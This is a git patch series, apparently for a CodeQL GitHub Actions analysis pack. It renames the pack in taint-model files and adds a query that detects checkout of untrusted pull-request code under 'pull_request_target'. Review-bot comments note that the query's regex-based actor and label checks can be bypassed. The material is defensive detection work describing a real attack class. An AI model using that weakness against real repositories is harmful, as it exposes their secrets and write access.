From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 21 Feb 2024 21:57:45 +0100 Subject: [PATCH 0069/1267] Fix QLpack names --- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 2 +- ql/lib/ext/android-actions_setup-android.model.yml | 4 ++-- ql/lib/ext/apple-actions_import-codesign-certs.model.yml | 4 ++-- ql/lib/ext/ashley-taylor_read-json-property-action.model.yml | 4 ++-- ql/lib/ext/ashley-taylor_regex-property-action.model.yml | 4 ++-- ql/lib/ext/aszc_change-string-case-action.model.yml | 2 +- ql/lib/ext/aws-actions_configure-aws-credentials.model.yml | 2 +- ql/lib/ext/bobheadxi_deployments.model.yml | 4 ++-- ql/lib/ext/bufbuild_buf-breaking-action.model.yml | 4 ++-- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 ++-- ql/lib/ext/cachix_cachix-action.model.yml | 4 ++-- ql/lib/ext/coursier_cache-action.model.yml | 4 ++-- ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml | 4 ++-- ql/lib/ext/csexton_release-asset-action.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ql/lib/ext/franzdiebold_github-env-vars-action.model.yml | 2 +- ql/lib/ext/game-ci_unity-test-runner.model.yml | 2 +- ql/lib/ext/getsentry_action-release.model.yml | 4 ++-- ql/lib/ext/github_codeql-action.model.yml | 2 +- ql/lib/ext/gradle_gradle-build-action.model.yml | 4 ++-- ql/lib/ext/haya14busa_action-cond.model.yml | 4 ++-- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 4 ++-- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 4 ++-- ql/lib/ext/khan_pull-request-comment-trigger.model.yml | 4 ++-- .../larsoner_circleci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 4 ++-- ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/mishakav_pytest-coverage-comment.model.yml | 2 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 2 +- .../ext/salsify_action-detect-and-tag-new-version.model.yml | 2 +- 
ql/lib/ext/shallwefootball_upload-s3-action.model.yml | 2 +- ql/lib/ext/shogo82148_actions-setup-perl.model.yml | 2 +- ql/lib/ext/suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/timheuer_base64-to-file.model.yml | 4 ++-- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/xt0rted_slash-command-action.model.yml | 2 +- 38 files changed, 56 insertions(+), 56 deletions(-) diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index 73e49a1fb06..f370a9fe222 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml index 11ea0ae7922..5ecd36f0926 100644 --- a/ql/lib/ext/android-actions_setup-android.model.yml +++ b/ql/lib/ext/android-actions_setup-android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint"] \ No newline at end of file + - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint"] diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml index 2fdf6c78d53..b81f5c17ca2 100644 --- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint"] \ No newline at end of file + - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint"] diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml index fb837050879..5ab9fee1667 100644 --- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint"] \ No newline at end of file + - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint"] diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml index d3b929956d1..a6e1364d218 100644 --- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint"] - - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint"] \ No newline at end of file + - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint"] diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml index f4527cf1b7f..cfdbb0b825f 100644 --- a/ql/lib/ext/aszc_change-string-case-action.model.yml 
+++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml index f9510094295..26b3a1fd3df 100644 --- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml index a458e229e04..2d8932d87fb 100644 --- a/ql/lib/ext/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint"] \ No newline at end of file + - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index a6cfbb6ee9e..ee8e6abef09 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] \ No newline at end of file + - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] 
diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index 9fb754ea9e1..c58b5a1e1d2 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] \ No newline at end of file + - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index bd9563317fb..1c6584eb9d5 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] \ No newline at end of file + - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml index 951a297207d..bfb45dddb66 100644 --- a/ql/lib/ext/coursier_cache-action.model.yml +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint"] \ No newline at end of file + - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index ab6458028a5..d4e35196c6c 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] \ No newline at end of file + - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml index 084e3328dc8..60e35e66a4d 100644 --- a/ql/lib/ext/csexton_release-asset-action.model.yml +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index b2872259fe9..2aa6013c872 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index c08e6f1b396..ffde7dc6a91 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request_target", "PR body"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index a0d4b357b5a..ab413b6e975 100644 
--- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml index d416a71c91d..e6688f3805d 100644 --- a/ql/lib/ext/getsentry_action-release.model.yml +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["getsentry/action-release", "*", "input.version", "output.version", "taint"] - - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint"] \ No newline at end of file + - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint"] diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml index 3710f7e07b8..b214178350c 100644 --- a/ql/lib/ext/github_codeql-action.model.yml +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint"] diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml index 6ea8a6c6800..0534d299627 100644 --- a/ql/lib/ext/gradle_gradle-build-action.model.yml +++ b/ql/lib/ext/gradle_gradle-build-action.model.yml 
@@ -1,8 +1,8 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint"] - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint"] - - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint"] \ No newline at end of file + - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint"] diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml index f0e0752b735..a8a528b85c5 100644 --- a/ql/lib/ext/haya14busa_action-cond.model.yml +++ b/ql/lib/ext/haya14busa_action-cond.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint"] - - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint"] \ No newline at end of file + - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint"] diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml index 4499d91cab6..6a907fcc3a1 100644 --- a/ql/lib/ext/hexlet_project-action.model.yml +++ b/ql/lib/ext/hexlet_project-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint"] diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml index a0f59b9e38b..f1a04c9e244 100644 --- a/ql/lib/ext/jsdaniell_create-json.model.yml +++ b/ql/lib/ext/jsdaniell_create-json.model.yml 
@@ -1,8 +1,8 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint"] - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint"] - - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint"] \ No newline at end of file + - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint"] diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index 8ae3bb0035d..b237ac313d2 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] \ No newline at end of file + - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index d95c69bc5b1..b872bbe2ed0 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "issue_comment", ""] - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "pull_request_comment", ""] \ No newline at end of file + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "pull_request_comment", ""] diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml index 3c60de5bb0a..abfca93b4ec 100644 
--- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml +++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint"] diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index 54302b86e83..91741f58706 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"] - - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] \ No newline at end of file + - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml index 7904383d707..dfa441761ab 100644 --- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml index 0c283016c86..18297709838 100644 --- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml +++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 2694ec2c453..3db3e9cf66c 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index aee6172b591..0190ffd9ad7 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 2167b16c7ba..87610c43440 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml index d90d7109fc2..a8db7e8313e 100644 --- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml index 20a412fd9b7..d171499049a 100644 --- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml +++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml index 8d0731c9792..4ab448b04c1 100644 --- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint"] diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml index 9364fd74752..299c387c81a 100644 --- a/ql/lib/ext/timheuer_base64-to-file.model.yml +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint"] - - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint"] \ No newline at end of file + - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint"] 
diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index f16b69c7af9..6ce7dd68b3f 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["tzkhan/pr-update-action", "*", "output.headMatch", "pull_request_target", ""] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 59a4c5b5652..72df42535db 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["xt0rted/slash-command-action", "*", "output.command-arguments", "issue_comment", ""] From ecefb7ffb57aaf1e82293143dcd5a29397a62415 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 22 Feb 2024 13:12:37 +0100 Subject: [PATCH 0070/1267] feat(untrusted checkout query): Add new query and tests --- ql/lib/codeql/actions/Ast.qll | 24 ++++++++-- ql/src/Security/CWE-094/UntrustedCheckout.ql | 47 +++++++++++++++++++ .../workflows/actor_trusted_checkout.yml | 26 ++++++++++ .../workflows/label_trusted_checkout.yml | 27 +++++++++++ .../.github/workflows/untrusted_checkout.yml | 25 ++++++++++ 5 files changed, 146 insertions(+), 3 deletions(-) create mode 100644 ql/src/Security/CWE-094/UntrustedCheckout.ql create mode 100644 ql/src/test/.github/workflows/actor_trusted_checkout.yml create mode 100644 ql/src/test/.github/workflows/label_trusted_checkout.yml create mode 100644 ql/src/test/.github/workflows/untrusted_checkout.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 8f04005be8f..339daf5365e 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -22,9 +22,7 @@ class AstNode instanceof YamlNode { */ class Statement extends AstNode { /** Gets the workflow that this job is a part of. */ - WorkflowStmt getEnclosingWorkflowStmt() { - this = result.getAChildNode*() - } + WorkflowStmt getEnclosingWorkflowStmt() { this = result.getAChildNode*() } } /** @@ -174,6 +172,8 @@ class JobStmt extends Statement instanceof Actions::Job { predicate usesReusableWorkflow() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) } + + IfStmt getIfStmt() { result = super.getIf() } } /** @@ -183,6 +183,24 @@ class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } JobStmt getJobStmt() { result = super.getJob() } + + IfStmt getIfStmt() { result = super.getIf() } +} + +/** + * An If node representing a conditional statement. + */ +class IfStmt extends Statement { + YamlMapping parent; + + IfStmt() { + (parent instanceof Actions::Step or parent instanceof Actions::Job) and + parent.lookup("if") = this + } + + Statement getEnclosingStatement() { result = parent } + + string getCondition() { result = this.(YamlScalar).getValue() } } /** diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-094/UntrustedCheckout.ql new file mode 100644 index 00000000000..4187e045c9b --- /dev/null +++ b/ql/src/Security/CWE-094/UntrustedCheckout.ql 
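Review bot: The new `IfStmt` class and the two `getIfStmt()` members (on `JobStmt` in the `@@ -174,6 +172,8 @@` hunk and on `StepStmt` in the `@@ -183,6 +183,24 @@` hunk) add public predicates with no QLDoc, although the neighbouring `getEnclosingWorkflowStmt()` has one. `getCondition()` returns the scalar's value as written, and the queries built on it regex-match that text, so the contract should be stated: `/** Gets the text of the 'if' value exactly as written in the workflow. */`. One-liners on `getIfStmt()` (`/** Gets the 'if' condition attached to this step, if any. */`) and on `getEnclosingStatement()` (`/** Gets the job or step this condition belongs to. */`) would match the file's style. `JobStmt` and `StepStmt` both start outside these hunks.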
@@ -0,0 +1,47 @@ +/** + * @name Checkout of untrusted code in trusted context + * @description Workflows triggered on `pull_request_target` have read/write access to the base repository and access to secrets. + * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment + * that is able to push to the base repository and to access secrets. + * @kind problem + * @problem.severity warning + * @precision low + * @id actions/pull-request-target + * @tags actions + * security + * external/cwe/cwe-094 + */ + +import actions + +/** + * An If node that contains an `actor` check + */ +class ActorCheckStmt extends IfStmt { + ActorCheckStmt() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") } +} + +/** + * An If node that contains a `label` check + */ +class LabelCheckStmt extends IfStmt { + LabelCheckStmt() { this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") } +} + +from WorkflowStmt w, JobStmt job, StepUsesExpr checkoutStep +where + w.hasTriggerEvent("pull_request_target") and + w.getAJobStmt() = job and + job.getAStepStmt() = checkoutStep and + checkoutStep.getCallee() = "actions/checkout" and + checkoutStep + .getArgumentExpr("ref") + .(ExprAccessExpr) + .getExpression() + .matches([ + "%github.event.pull_request.head.ref%", "%github.event.pull_request.head.sha%", + "%github.event.pull_request.number%", "%github.event.number%", "%github.head_ref%" + ]) and + not exists(ActorCheckStmt check | job.getIfStmt() = check or checkoutStep.getIfStmt() = check) and + not exists(LabelCheckStmt check | job.getIfStmt() = check or checkoutStep.getIfStmt() = check) +select checkoutStep, "Potential unsafe checkout of untrusted pull request on 'pull_request_target'." diff --git a/ql/src/test/.github/workflows/actor_trusted_checkout.yml b/ql/src/test/.github/workflows/actor_trusted_checkout.yml new file mode 100644 index 00000000000..08a25646d6a --- /dev/null 
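Review bot: `ActorCheckStmt` and `LabelCheckStmt` accept any `if:` whose text merely mentions `github.actor` or `github.event.pull_request.labels`, so the two `not exists(...)` lines at the end of the `where` clause suppress the alert without checking what the condition actually enforces. A condition that only excludes one account (a constructed example: `github.actor != 'some-bot'`) matches the regex, yet every other contributor still reaches the checkout of the pull-request head. The comparison operator and the compared value are never inspected. If tightening the match is out of scope for a `@precision low` query, the class comments should state the limitation, e.g. `An If node whose condition mentions the actor; the comparison itself is not validated.`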
